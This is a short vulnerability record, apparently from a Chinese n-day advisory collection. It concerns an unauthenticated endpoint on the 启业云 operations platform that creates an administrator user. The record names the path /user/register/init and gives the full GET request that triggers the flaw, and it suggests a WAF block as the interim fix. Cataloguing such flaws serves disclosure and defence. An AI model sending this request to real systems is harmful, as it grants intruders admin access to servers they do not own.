vendor = "启业云"
name = "启业云运维平台 未授权创建管理员用户漏洞"
type = "未授权访问"
version = "未知"
path = "/user/register/init"
detail = "GET /user/register/init HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
